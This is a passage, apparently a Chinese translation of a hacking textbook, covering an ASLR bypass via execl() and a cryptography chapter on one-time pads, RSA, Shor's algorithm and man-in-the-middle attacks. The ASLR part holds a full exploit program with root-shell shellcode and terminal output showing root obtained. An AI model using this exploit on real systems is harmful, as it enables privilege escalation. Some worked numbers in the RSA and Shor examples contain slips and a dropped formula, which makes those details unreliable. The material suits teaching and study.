这种情况正是使黑客技术成为一门艺术的原因。计算机安全的状态是一个不断变化的景观，每天都会发现和修补特定的漏洞。然而，如果你理解了本书中解释的核心黑客技术概念，你就可以以新的和创造性的方式应用它们来解决当天的难题。就像乐高积木一样，这些技术可以用数百万种不同的组合和配置来使用。就像任何艺术一样，你练习这些技术的次数越多，你对它们的理解就会越好。这种理解带来了猜测偏移量和通过地址范围识别内存段的知识。

在这种情况下，问题仍然是 ASLR。希望你现在有几个绕过的想法可以尝试。不要害怕使用调试器来检查实际发生的情况。可能存在几种绕过 ASLR 的方法，你可能会发明一种新技术。如果你找不到解决方案，不要担心——我将在下一节中解释一种方法。但在继续阅读之前，花点时间自己思考一下这个问题是值得的。

第一次尝试

事实上，我在 Linux 内核中的 linux-gate 修复之前就写了这一章，所以我不得不拼凑一个 ASLR 绕过方案。我的第一个想法是利用execl()函数族。我们一直在使用execve()函数在我们的 shellcode 中启动 shell，如果你仔细观察（或者只是阅读手册页面），你会注意到execve()函数会替换当前运行的进程为新进程映像。

EXEC(3)                Linux Programmer's Manual

NAME
       execl, execlp, execle, execv, execvp - execute a file

SYNOPSIS
       #include <unistd.h>

       extern char **environ;

       int execl(const char *path, const char *arg, ...);
       int execlp(const char *file, const char *arg, ...);
       int execle(const char *path, const char *arg,
                  ..., char * const envp[]);
       int execv(const char *path, char *const argv[]);
       int execvp(const char *file, char *const argv[]);

DESCRIPTION
       The  exec()  family  of  functions  replaces the current process
       image with a new process image.  The functions described in this
       manual page are front-ends for the function execve(2).  (See the
       manual page for execve()  for  detailed  information  about  the
       replacement of the current process.)

如果内存布局仅在进程启动时随机化，这里可能存在一个弱点。让我们通过一段打印栈变量地址并使用execl()函数执行 aslr_demo 的代码来测试这个假设。

aslr_execl.c

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
   int stack_var;

   // Print an address from the current stack frame.
   printf("stack_var is at %p\n", &stack_var);

   // Start aslr_demo to see how its stack is arranged.
   execl("./aslr_demo", "aslr_demo", NULL);
}

当这个程序编译并执行时，它将使用execl()执行 aslr_demo，它也会打印栈变量（缓冲区）的地址。这让我们可以比较内存布局。

reader@hacking:~/booksrc $ gcc -o aslr_demo aslr_demo.c
reader@hacking:~/booksrc $ gcc -o aslr_execl aslr_execl.c
reader@hacking:~/booksrc $ ./aslr_demo test
buffer is at 0xbf9f31c0
reader@hacking:~/booksrc $ ./aslr_demo test
buffer is at 0xbffaaf70
reader@hacking:~/booksrc $ ./aslr_execl
stack_var is at 0xbf832044
buffer is at 0xbf832000
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbf832044 - 0xbf832000"
$1 = 68
reader@hacking:~/booksrc $ ./aslr_execl
stack_var is at 0xbfa97844
buffer is at 0xbf82f800
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfa97844 - 0xbf82f800"
$1 = 2523204
reader@hacking:~/booksrc $ ./aslr_execl
stack_var is at 0xbfbb0bc4
buffer is at 0xbff3e710
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfbb0bc4 - 0xbff3e710"
$1 = 4291241140
reader@hacking:~/booksrc $ ./aslr_execl
stack_var is at 0xbf9a81b4
buffer is at 0xbf9a8180
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbf9a81b4 - 0xbf9a8180"
$1 = 52
reader@hacking:~/booksrc $

第一个结果看起来非常有希望，但进一步的尝试表明，当使用execl()执行新进程时，确实存在一定程度的不确定性。我确信这并不总是这样，但开源的进步是相当稳定的。这并不是什么大问题，因为我们有处理这种部分不确定性的方法。

玩概率游戏

至少使用execl()可以限制随机性，并给我们一个大致的地址范围。剩余的不确定性可以用 NOP 滑梯来处理。快速检查 aslr_demo 显示，溢出缓冲区需要 80 字节来覆盖栈上存储的返回地址。

reader@hacking:~/booksrc $ gdb -q ./aslr_demo
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) run $(perl -e 'print "AAAA"x19 . "BBBB"')
Starting program: /home/reader/booksrc/aslr_demo $(perl -e 'print "AAAA"x19 . "BBBB"')
buffer is at 0xbfc7d3b0

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) p 20*4
$1 = 80
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $

由于我们可能需要一个相当大的 NOP 滑梯，在下面的攻击中，NOP 滑梯和 shellcode 将被放在返回地址覆盖之后。这允许我们注入所需的尽可能多的 NOP 滑梯。在这种情况下，大约一千字节应该足够了。

aslr_execl_exploit.c

#include <stdio.h>
#include <unistd.h>
#include <string.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // Standard shellcode

int main(int argc, char *argv[]) {
   unsigned int i, ret, offset;
   char buffer[1000];

   printf("i is at %p\n", &i);

   if(argc > 1) // Set offset.
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset + 200; // Set return address.
   printf("ret addr is %p\n", ret);

for(i=0; i < 90; i+=4) // Fill buffer with return address.
     *((unsigned int *)(buffer+i)) = ret;
  memset(buffer+84, 0x90, 900); // Build NOP sled.
  memcpy(buffer+900, shellcode, sizeof(shellcode));

  execl("./aslr_demo", "aslr_demo", buffer,  NULL);
}

这段代码应该对你来说是有意义的。值200被加到返回地址上，以跳过用于覆盖的前 90 个字节，因此执行会落在 NOP 滑梯的某个地方。

reader@hacking:~/booksrc $ sudo chown root ./aslr_demo
reader@hacking:~/booksrc $ sudo chmod u+s ./aslr_demo
reader@hacking:~/booksrc $ gcc aslr_execl_exploit.c
reader@hacking:~/booksrc $ ./a.out
i is at 0xbfa3f26c
ret addr is 0xb79f6de4
buffer is at 0xbfa3ee80
Segmentation fault
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfa3f26c - 0xbfa3ee80"
$1 = 1004
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfe9b6cc
ret addr is 0xbfe9b3a8
buffer is at 0xbfe9b2e0
sh-3.2# exit
exit
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfb5a38c
ret addr is 0xbfb5a068
buffer is at 0xbfb20760
Segmentation fault
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfb5a38c - 0xbfb20760"
$1 = 236588
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfce050c
ret addr is 0xbfce01e8
buffer is at 0xbfce0130
sh-3.2# whoami
root 
sh-3.2#

如你所见，偶尔随机化会导致利用失败，但只需成功一次即可。这利用了我们可以尝试利用任意多次的事实。当地址空间布局随机化（ASLR）正在运行时，相同的技巧也会在 notesearch 利用中起作用。尝试编写一个能够做到这一点的利用程序。

一旦理解了利用程序的基本概念，凭借一点创意，就可以产生无数的变化。由于程序规则是由其创造者定义的，因此利用一个看似安全的程序仅仅是战胜他们自己的游戏。新的巧妙方法，如堆栈保护器和入侵检测系统（IDSs），试图弥补这些问题，但这些解决方案也不是完美的。黑客的独创性往往能发现这些系统中的漏洞。只需想想他们没有考虑到的事情。

第 0x700 章。密码学

密码学被定义为对密码学或密码分析的研究。密码学简单来说就是通过使用密码进行秘密通信的过程，而密码分析则是破解或解密这种秘密通信的过程。历史上，在战争期间，密码学特别受到关注，当时各国使用秘密代码与他们的部队进行通信，同时试图破解敌人的代码以渗透他们的通信。

战时的应用仍然存在，但随着越来越多的关键交易通过互联网进行，密码学在民用生活中的使用正变得越来越流行。网络嗅探如此普遍，以至于有人总是嗅探网络流量的偏执假设可能并不那么偏执。密码、信用卡号码和其他专有信息都可以通过未加密的协议进行嗅探和窃取。加密通信协议为这种隐私缺乏问题提供了解决方案，并允许互联网经济运行。如果没有安全套接字层（SSL）加密，在热门网站上的信用卡交易将会非常不便或不安全。

所有这些私有数据都由可能安全的密码学算法进行保护。目前，能够被证明是安全的密码系统对于实际应用来说过于复杂。因此，在没有数学安全证明的情况下，使用的是实际安全的密码系统。这意味着可能存在击败这些密码的捷径，但至今没有人能够实现它们。当然，也存在完全不安全的密码系统。这可能是由于实现方式、密钥大小，或者仅仅是密码本身在密码分析中的弱点。1997 年，根据美国法律，出口软件中加密的最大允许密钥大小为 40 位。这个密钥大小的限制使得相应的密码不安全，正如 RSA 数据安全和加州大学伯克利分校的研究生伊恩·戈德堡所展示的那样。RSA 发布了一个挑战，要求解密使用 40 位密钥加密的消息，三个半小时后，伊恩就完成了这个任务。这是强有力的证据表明 40 位密钥对于安全的密码系统来说不够大。

密码学以多种方式与黑客攻击相关。在最纯粹的水平上，解决谜题的挑战对好奇者来说具有吸引力。在更恶劣的水平上，被谜题保护的秘密数据可能更具吸引力。破解或绕过秘密数据的密码保护可以提供一种满足感，更不用说对受保护数据内容的了解。此外，强大的密码学有助于避免检测。设计用于嗅探网络流量以寻找攻击签名的昂贵网络入侵检测系统，如果攻击者使用加密通信通道，则毫无用处。通常，为了客户安全提供的加密 Web 访问被攻击者用作难以监控的攻击向量。

信息论

许多密码安全的概念源于克劳德·香农的头脑。他的思想对密码学领域产生了巨大影响，特别是扩散和混淆的概念。尽管无条件安全、一次性密码、量子密钥分发和计算安全这些概念并非香农实际提出的，但他在完美保密和信息理论方面的思想对安全定义产生了巨大影响。

无条件安全

如果一个密码系统即使拥有无限的计算资源也无法被破解，那么它被认为是无条件安全的。这意味着密码分析是不可能的，即使在穷举暴力攻击中尝试了所有可能的关键，也无法确定哪个是正确的一个。

一次性密码

一个无条件安全的密码系统的例子是一次性密码。一次性密码是一个非常简单的密码系统，它使用称为填充块的随机数据。填充块必须至少与要编码的明文消息一样长，填充块上的随机数据必须是真正随机的，从最字面的意义上讲。制作两个相同的填充块：一个给接收者，一个给发送者。要编码一条消息，发送者只需将明文消息的每个比特与填充块的相应比特进行异或运算。消息编码后，填充块被销毁以确保它只使用一次。然后，可以安全地将加密消息发送给接收者，无需担心密码分析，因为如果没有填充块，加密消息是无法被破解的。当接收者收到加密消息时，他也用他的填充块的相应比特对加密消息的每个比特进行异或运算，以产生原始的明文消息。

虽然一次性密码在理论上是无法被破解的，但在现实中，它并不真正实用。一次性密码的安全性依赖于密码的安全性。当密码被分发给接收者和发送者时，假定密码传输通道是安全的。为了真正安全，这可能涉及到面对面会议和交换，但为了方便，密码传输可能通过另一个密码来辅助完成。这种便利的代价是，整个系统现在只比最薄弱的环节强，而这将是用来传输密码的密码。由于密码由与明文消息长度相同的随机数据组成，并且整个系统的安全性仅与密码传输的安全性相当，因此通常更有意义的是只发送使用与传输密码相同的密码编码的明文消息。

量子密钥分发

量子计算的兴起为密码学领域带来了许多有趣的事物。其中之一是利用量子密钥分发实现的一次性密码的实用化。量子纠缠的神秘性可以提供一种可靠且保密的方法来发送随机位串，这些位串可以用作密钥。这是通过在光子中使用非正交量子态来实现的。

不深入细节的话，光子的偏振是其电场的振荡方向，在这种情况下可以是水平、垂直或两条对角线之一。非正交简单来说就是状态之间相隔的角度不是 90 度。令人好奇的是，无法确定一个光子具有这四种偏振中的哪一种。水平和垂直偏振的直角基与两条对角线偏振的对角基不相容，因此，由于海森堡不确定性原理，这两组偏振不能同时被测量。可以使用滤波器来测量偏振——一个用于直角基，一个用于对角基。当一个光子通过正确的滤波器时，其偏振不会改变，但如果它通过错误的滤波器，其偏振将被随机修改。这意味着任何试图测量光子偏振的窃听尝试都有很大机会打乱数据，使得通道不安全的迹象变得明显。

这些量子力学的奇异方面被查尔斯·贝内特和吉勒·布拉萨德在第一个也可能是最著名的量子密钥分发方案中得到了很好的应用，该方案称为BB84。首先，发送者和接收者就四个偏振的比特表示达成一致，使得每个基础都有 1 和 0。在这个方案中，1 可以由垂直光子偏振和其中一个对角偏振（正 45 度）表示，而 0 可以由水平偏振和另一个对角偏振（负 45 度）表示。这样，当测量直角偏振时和当测量对角偏振时，1 和 0 都可以存在。

然后，发送者发送一串随机光子，每个光子来自随机选择的基础（要么是直角要么是对角），这些光子被记录下来。当接收者接收到一个光子时，他也会随机选择在直角基础或对角基础中测量它，并记录结果。现在，双方公开比较他们为每个光子使用的哪个基础，并且只保留他们使用相同基础测量的光子的数据。这不会揭示光子的比特值，因为每个基础中都有 1 和 0。这构成了一次性密码的密钥。

由于窃听者最终可能会改变一些光子的偏振状态，从而混淆数据，因此可以通过计算密钥中某些随机子集的错误率来检测窃听。如果错误太多，那么可能有人正在窃听，密钥应该被丢弃。如果没有，那么密钥数据的传输是安全且私密的。

计算安全性

如果破解该密码系统的最佳已知算法需要不合理数量的计算资源和时间，则认为密码系统是计算安全的。这意味着理论上窃听者可以破解加密，但实际上这样做是不切实际的，因为所需的时间和资源将远远超过加密信息的价值。通常，破解计算安全密码系统所需的时间以数万年来衡量，即使假设有大量的计算资源也是如此。大多数现代密码系统都属于这一类。

重要的是要注意，破解密码系统的最佳已知算法总是在不断发展和改进。理想情况下，如果破解它的最佳算法需要不合理数量的计算资源和时间，则可以将密码系统定义为计算安全的，但目前尚无方法证明给定的加密破解算法是并且始终是最佳算法。因此，使用当前的最佳已知算法来衡量密码系统的安全性。

算法运行时间

算法运行时间与程序的运行时间略有不同。由于算法只是一个想法，评估算法的处理速度没有限制。这意味着用分钟或秒来表示算法运行时间是没有意义的。

在没有处理器速度和架构等因素的情况下，算法的重要未知因素是输入大小。在 1,000 个元素上运行的排序算法肯定比在 10 个元素上运行的相同排序算法花费更长的时间。输入大小通常用n表示，每个原子步骤都可以用一个数字来表示。一个简单算法（如以下所示）的运行时间可以用n来表示。

for(i = 1 to n) {
   Do something;
   Do another thing;
} 
Do one last thing;

这个算法循环n次，每次执行两个操作，然后执行最后一个操作，因此这个算法的时间复杂度将是 2n + 1。一个更复杂的算法，如以下所示，附加了一个嵌套循环，其时间复杂度将是n² + 2n + 1，因为新的操作执行n²次。

for(x = 1 to n) {
   for(y = 1 to n) {
      Do the new action;
   }
}
for(i = 1 to n) {
   Do something;
   Do another thing;
} 
Do one last thing;

但这种时间复杂度的详细程度仍然过于细化。例如，当n变大时，2n + 5 和 2n + 365 之间的相对差异变得越来越小。然而，当n变大时，2n² + 5 和 2n + 5 之间的相对差异变得越来越大。这种类型的泛化趋势对于算法的运行时间来说是最重要的。

考虑两个算法，一个的时间复杂度为 2n + 365，另一个为 2n² + 5。对于小的n值，2n² + 5 算法将优于 2n + 365 算法。但当n = 30 时，两个算法的表现相同，对于所有大于 30 的n，2n + 365 算法将优于 2n² + 5 算法。由于只有 30 个n值中 2n² + 5 算法表现更好，而 2n + 365 算法在无限多个n值中表现更好，因此 2n + 365 算法通常更有效率。

这意味着，一般来说，算法的时间复杂度相对于输入大小的增长率比任何固定输入的时间复杂度更重要。虽然这并不总是适用于特定的实际应用，但这种对算法效率的测量通常在所有可能的平均应用中是正确的。

渐近符号

渐近符号是表达算法效率的一种方法。它被称为渐近符号，因为它处理算法在输入大小接近渐近极限无穷大时的行为。

回到 2n + 365 算法和 2n² + 5 算法的例子，我们确定 2n + 365 算法通常更有效，因为它遵循n的趋势，而 2n² + 5 算法遵循n²的一般趋势。这意味着对于所有足够大的n，2n + 365 被一个正的n倍数所限制，而 2n² + 5 被一个正的n²倍数所限制。

这听起来可能有些令人困惑，但它真正意味着的是存在一个趋势值的正常数和一个n的下限，使得趋势值乘以这个常数将始终大于所有大于下限的n的时间复杂度。换句话说，2n² + 5 是n²阶的，而 2n + 365 是n阶的。有一个方便的数学符号来表示这一点，称为大 O 符号，用来描述一个算法是n²阶的，看起来像 O(n²)。

将算法的时间复杂度转换为大 O 符号的一个简单方法就是简单地查看高阶项，因为这些项将在n足够大时最为重要。所以一个时间复杂度为 3n⁴ + 43n³ + 763n + log n + 37 的算法将是大 O(n⁴)阶的，而 54n⁷ + 23n⁴ + 4325 将是 O(n⁷)阶的。

对称加密

对称密码是使用相同密钥加密和解密消息的密码系统。与不对称加密相比，加密和解密过程通常更快，但密钥分发可能很困难。

这些密码通常要么是分组密码，要么是流密码。一个分组密码在固定大小的块上操作，通常是 64 位或 128 位。相同的明文块将始终使用相同的密钥加密成相同的密文块。DES、Blowfish 和 AES（Rijndael）都是分组密码。流密码生成一个伪随机的比特流，通常每次一个比特或一个字节。这被称为密钥流，它与明文进行异或运算。这对于加密连续的数据流非常有用。RC4 和 LSFR 是流行的流密码示例。RC4 将在“无线 802.11b 加密”中深入讨论，请参阅无线 802.11b 加密。

DES 和 AES 都是流行的分组密码。在构建分组密码时，投入了大量的思考，以使其能够抵御已知的密码分析攻击。在分组密码中反复使用的两个概念是混淆和扩散。混淆指的是用于隐藏明文、密文和密钥之间关系的各种方法。这意味着输出位必须涉及一些复杂的密钥和明文的转换。扩散旨在尽可能地将明文位和密钥位的影响扩散到密文的大部分。产品密码通过重复使用各种简单操作来结合这两个概念。DES 和 AES 都是产品密码。

DES 也使用 Feistel 网络。它在许多分组密码中用于确保算法是可逆的。基本上，每个块被分为两个部分，左边（L）和右边（R）。然后，在一个操作轮次中，新的左边（L[i]）被设置为等于旧的右边（R[i-1]），而新的右边（R[i]）由旧的左边（L[i-1]）与使用旧的右边（R[i-1]）和该轮次的子密钥（K[i]）的函数输出的异或（⊕）运算组成。通常，每个操作轮次都有一个单独的子密钥，该子密钥在之前计算。

L[i] 和 R[i] 的值如下（⊕符号表示异或运算）：

L[i] = R[i-1]
R[i] = L[i-1] ⊕ f(R[i-1], K[i])

DES 使用 16 轮操作。这个数字是专门选择的，以防御差分密码分析。DES 的唯一真正已知的弱点是其密钥大小。由于密钥只有 56 位，整个密钥空间可以在几周内通过专用硬件上的穷举暴力攻击来检查。

Triple-DES 通过使用两个连接在一起的 DES 密钥来解决这个问题，总密钥大小为 112 位。加密是通过使用第一个密钥加密明文块，然后使用第二个密钥解密，最后再次使用第一个密钥加密来完成的。解密过程类似，但加密和解密操作被切换。增加的密钥大小使得暴力破解尝试指数级地更困难。

大多数行业标准分组密码对所有已知的密码分析形式都具有抵抗力，并且密钥大小通常太大，无法尝试穷举暴力攻击。然而，量子计算提供了一些有趣的可能，但这些通常被过度炒作。

Lov Grover 的量子搜索算法

量子计算承诺了巨大的并行性。量子计算机可以在叠加态（可以想象成数组）中存储许多不同的状态，并对它们同时进行计算。这对于穷举任何东西，包括块加密，都是理想的。可以将所有可能的关键字加载到叠加态中，然后同时对所有关键字执行加密操作。棘手的部分是正确地从叠加态中获取值。量子计算机很奇怪，当叠加态被观察时，整个系统会分解成单个状态。不幸的是，这种分解最初是随机的，叠加态中每个状态的分解概率是相等的。

如果没有某种方法来操纵叠加态的概率，只需猜测密钥就能达到相同的效果。幸运的是，一个名叫 Lov Grover 的人提出了一种算法，可以操纵叠加态的概率。这个算法允许在增加某些期望状态的概率的同时减少其他状态的概率。这个过程重复几次，直到将叠加态分解成期望状态几乎可以保证。这需要大约步。

使用一些基本的指数数学技能，你会注意到这实际上将穷举暴力攻击的密钥大小减半。因此，对于极度偏执的人来说，将块加密的密钥大小加倍将使其对量子计算机进行穷举暴力攻击的理论可能性具有抵抗力。

非对称加密

非对称加密使用两个密钥：一个公钥和一个私钥。公钥是公开的，而私钥是保密的；因此得名。任何用公钥加密的消息只能用私钥解密。这解决了密钥分发的问题——公钥是公开的，通过使用公钥，可以为相应的私钥加密消息。与对称加密不同，不需要额外的通信渠道来传输密钥。然而，非对称加密通常比对称加密慢得多。

RSA

RSA 是更受欢迎的非对称算法之一。RSA 的安全性基于分解大数的难度。首先，选择两个质数P和Q，然后计算它们的乘积N：

N = P · Q

然后，需要计算介于 1 和N - 1 之间的相对质数数量（如果两个数的最大公约数是 1，则称这两个数是相对质数）。这被称为欧拉函数，通常用小写希腊字母φ（φ）表示。

例如，φ(9) = 6，因为 1、2、4、5、7 和 8 与 9 互质。应该很容易注意到，如果 N 是一个质数，那么 φ(N) 将是 N –1。一个不那么明显的事实是，如果 N 是两个质数 P 和 Q 的乘积，那么 φ(P · Q) = (P –1) · (Q* –1)。这对于计算 RSA 中的 φ(N) 非常有用。

必须随机选择一个与 φ(N) 互质的加密密钥 E。然后必须找到一个满足以下方程的解密密钥，其中 S 是任何整数：

E · D = S · φ(N) + 1

这可以通过扩展欧几里得算法来解决。欧几里得算法是一个非常古老的算法，它碰巧是一种计算两个数最大公约数（GCD）的非常快速的方法。较大的数被除以较小的数，只注意余数。然后，较小的数被除以余数，这个过程重复进行，直到余数为零。在余数达到零之前的最后一个余数是两个原始数的最大公约数。这个算法非常快，运行时间为 O(log[10]N)。这意味着找到答案所需的步骤数大约与较大数的位数相同。

在下面的表格中，7253 和 120 的最大公约数（写作 gcd(7253, 120)）将被计算。表格首先将两个数放在 A 和 B 列中，较大的数放在 A 列。然后 A 被除以 B，余数放在 R 列。在下一行，旧的 B 成为新的 A，旧的 R 成为新的 B。再次计算 R，这个过程重复进行，直到余数为零。在余数为零之前的最后一个 R 值就是最大公约数。

| gcd(7253, 120) | |
| --- | --- | --- |

A	B	R
7253	120	53
120	53	14
53	14	11
14	11	3
11	3	2
3	2	1
2	1	0

因此，7243 和 120 的最大公约数是 1。这意味着 7250 和 120 互质。

扩展欧几里得算法用于找到两个整数 J 和 K，使得

J · A + K · B = R

当 gcd(A, B) = R.

这是通过反向工作欧几里得算法来完成的。在这种情况下，尽管如此，商很重要。以下是先前示例中的数学，包括商：

7253 = 60 · 120 + 53
120 = 2 · 53 + 14
53 = 3 · 14 + 11
14 = 1 · 11 + 3
11 = 3 · 3 + 2
3 = 1 · 2 + 1

通过一点基本的代数，可以将每一行的项移动，使得余数（以粗体显示）单独位于等号左边：

53 = 7253 – 60 · 120
14 = 120 – 2 · 53
11 = 53 – 3 · 14
3 = 14 – 1 · 11
2 = 11 – 3 · 3
1 = 3 – 1 · 2

从底部开始，很明显：

1 = 3 – 1 · 2

然而，上面的那一行是 2 = 11 –3 · 3，这给出了 2 的一个替换：

1 = 3 – 1 · (11 – 3 · 3)
1 = 4 · 3 – 1 · 11

显示 3 = 14 – 1 · 11 的那一行，也可以用来替换 3：

1 = 4 · (14 – 1 · 11) – 1 · 11
1 = 4 · 14 – 5 · 11

当然，上面那一行显示 11 = 53 – 3 · 14，这也可以替换 11：

1 = 4 · 14 – 5 · (53 – 3 · 14)
1 = 19 · 14 – 5 · 53

按照这个模式，我们使用显示 14 = 120 – 2 · 53 的那一行，进行另一个替换：

1 = 19 · (120 – 2 · 53) – 5 · 53
1 = 19 · 120 – 43 · 53

最后，最上面的一行显示 53 = 7253 – 60 · 120，进行最后的替换：

1 = 19 · 120 – 43 · (7253 – 60 · 120)
1 = 2599 · 120 – 43 · 7253
2599 · 120 + – 43 · 7253 = 1

这表明 J 和 K 分别是 2599 和 –43。

在前面的例子中选择的数字是为了与 RSA 相关。假设 P 和 Q 的值是 11 和 13，N 将是 143。因此，φ(N) = 120 = (11 – 1) · (13 – 1)。由于 7253 与 120 互质，这个数字是 E 的一个很好的值。

如果你记得，目标是找到一个满足以下方程的 D 的值：

E · D = S · φ(N) + 1

一些基本的代数运算使其以更熟悉的形式呈现：

D · E + S · φ(N) = 1
D · 7253 ± S · 120 = 1

使用扩展欧几里得算法的值，显然 D = –43。S 的值并不重要，这意味着这个数学是在模 φ(N)，即模 120 下进行的。这反过来意味着 D 的正等价值是 77，因为 120 – 43 = 77。这可以放入上面的方程中：

E · D = S · φ(N) + 1
7253 · 77 = 4654 · 120 + 1

N 和 E 的值作为公钥分发，而 D 作为私钥保密。P 和 Q 被丢弃。加密和解密函数相当简单。

加密：C = M^E(modN)
解密：M = C^D(modN)

例如，如果信息 M 是 98，加密过程如下：

98⁷²⁵³ = 76(mod143)

密文将是 76。然后，只有知道 D 的值的人才能解密信息，并从数字 76 中恢复出数字 98，如下所示：

76⁷⁷ = 98(mod143)

显然，如果信息 M 大于 N，则必须将其分解成小于 N 的块。

这个过程是由欧拉函数定理实现的。它指出，如果 M 和 N 互质，且 M 是较小的数，那么当 M 自乘 φ(N) 次并除以 N 时，余数总是 1：

如果 gcd(M, N) = 1 且 M < N，则 M^(φ(N)) = 1(modN)

由于所有这些都是在模 N 下完成的，因此以下也是正确的，这是由于乘法在模算术中的工作方式：

M^(φ(N)) · M^(φ(N)) = 1 ·1(modN)
M^(2 · φ(N)) = 1(modN)

这个过程可以重复进行 S 次，以产生以下结果：

M^(S · φ(N)) = 1(modN)

如果两边都乘以 M，结果是：

M^(S · φ(N) · M) = 1 ·M(modN)
M^(S · φ(N) + 1) = M(modN)

这个等式基本上是 RSA 的核心。一个数 M，在模 N 的幂次下，再次产生原始数 M。这基本上是一个返回其自身输入的函数，本身并不那么有趣。但如果这个等式可以被分成两个独立的部分，那么一部分可以用来加密，另一部分用来解密，再次产生原始信息。这可以通过找到两个数 E 和 D，它们相乘等于 S 乘以φ(N)加 1 来实现。然后这个值可以代入到前面的等式中：

E · D = S ·φ(N) + 1
M^(E · D) = M(modN)

这相当于：

M^(ED) = (MmodN*)

这可以分解为两个步骤：

ME = C(modN)
CD = M(modN)

这基本上就是 RSA。算法的安全性取决于保持 D 的秘密。但由于 N 和 E 都是公开值，如果 N 可以被分解成原始的 P 和 Q，那么φ(N)可以很容易地通过(P –1) · (Q –1)计算出来，然后使用扩展欧几里得算法确定 D。因此，RSA 的密钥大小必须考虑到已知的最佳分解算法，以保持计算安全。目前，已知的大数分解算法是数域筛法（NFS）。这个算法有亚指数运行时间，相当不错，但仍然不够快，无法在合理的时间内破解 2048 位的 RSA 密钥。

彼得·肖尔的量子分解算法

再次强调，量子计算在计算潜力上提供了惊人的增加。彼得·肖尔能够利用量子计算机的巨大并行性，通过使用古老的数论技巧高效地分解数字。

该算法实际上相当简单。取一个数 N 进行分解。选择一个小于 N 的值 A。这个值还应该与 N 互质，但假设 N 是两个质数的乘积（在尝试分解数字以破解 RSA 时，这始终是情况），如果 A 与 N 不互质，那么 A 是 N 的因子之一。

接下来，用连续的数字填充叠加，从 1 开始计数，并将这些值中的每一个通过函数 f(x) = A^x(modN)传递。这一切都是通过量子计算的魔力同时完成的。结果中会出现重复的模式，并且必须找到这个重复的周期。幸运的是，这可以在量子计算机上快速完成，使用傅里叶变换。这个周期将被称为 R。

然后，简单地计算 gcd(A^(R/2) + 1, N)和 gcd(A^(R/2) –1, N)。至少这些值中的一个应该是 N 的因子。这是可能的，因为 A^R = 1(modN)，下面将进一步解释。

A^R = 1(modN)
(A^(R/2))² = 1(modN)
(A^(R/2))² –1 = 0(modN)
(A^(R/2) –1) · (A^(R/2) + 1) = 0(modN)

这意味着 (A^(R/2) –1) · (A^(R/2) + 1) 是 N 的整数倍。只要这些值不会归零，其中之一将与 N 有一个共同的因子。

要破解之前的 RSA 示例，必须分解公钥值 N。在这种情况下，N 等于 143。接下来，选择一个与 N 互质且小于 N 的 A 值，因此 A 等于 21。函数看起来像 f(x) = 21^x(mod143)。从 1 开始，直到量子计算机允许的最高值，每个连续的值都将通过这个函数。

为了简洁起见，假设量子计算机有三个量子位，因此叠加可以保持八个值。

x = 1	211(mod143) = 21
x = 2	212(mod143) = 12
x = 3	213(mod143) = 109
x = 4	214(mod143) = 1
x = 5	215(mod143) = 21
x = 6	216(mod143) = 12
x = 7	217(mod143) = 109
x = 8	218(mod143) = 1

在这里，周期很容易通过肉眼确定：R 是 4。有了这些信息，gcd(21² –1143) 和 gcd(21² + 1143) 应该会产生至少一个因子。这次，两个因子实际上都出现了，因为 gcd(440, 143) = 11 和 gcd(442, 142) = 13。然后可以使用这些因子重新计算之前 RSA 示例的私钥。

混合加密

一种混合密码系统结合了两种加密算法的优点。使用非对称加密算法交换一个随机生成的密钥，该密钥用于使用对称加密算法加密剩余的通信。这提供了对称加密算法的速度和效率，同时解决了安全密钥交换的难题。混合加密算法被大多数现代加密应用使用，如 SSL、SSH 和 PGP。

由于大多数应用都使用对密码分析具有抵抗力的加密算法，因此攻击加密算法通常不会奏效。然而，如果攻击者能够拦截双方之间的通信并伪装成其中一方或另一方，则可以攻击密钥交换算法。

中间人攻击

一种 中间人攻击 (MitM) 是一种绕过加密的巧妙方法。攻击者坐在两个通信方之间，每个通信方都相信他们正在与另一方通信，但实际上双方都在与攻击者通信。

当建立两个当事人之间的加密连接时，将生成一个密钥并使用非对称加密算法进行传输。通常，这个密钥用于加密两个当事人之间的进一步通信。由于密钥是安全传输的，并且后续流量由密钥加密，因此所有这些流量对于任何试图嗅探这些数据包的潜在攻击者来说都是不可读的。

然而，在中间人攻击中，甲方认为她正在与乙方通信，乙方也认为他正在与甲方通信，但实际上，双方都在与攻击者通信。因此，当甲方与乙方协商加密连接时，甲方实际上是在与攻击者建立加密连接，这意味着攻击者使用非对称加密安全地通信并学习密钥。然后攻击者只需再与乙方建立另一个加密连接，乙方就会相信他正在与甲方通信，如下面的插图所示。

图 0x700-1.

这意味着攻击者实际上维护了两个独立的加密通信通道，使用两个不同的加密密钥。来自 A 的数据包使用第一个密钥加密并发送到攻击者，A 认为这是 B。攻击者随后使用第一个密钥解密这些数据包，并使用第二个密钥重新加密它们。然后攻击者将新加密的数据包发送给 B，B 认为这些数据包实际上是 A 发送的。通过坐在中间并维护两个不同的密钥，攻击者能够窃听甚至修改 A 和 B 之间的流量，而双方都不会察觉。

在使用 ARP 缓存中毒工具重定向流量后，可以使用许多 SSH 中间人攻击工具。其中大部分只是对现有 openssh 源代码的修改。一个值得注意的例子是由 Claes Nyberg 编写的名为 mitm-ssh 的软件包，它已经被包含在 LiveCD 中。

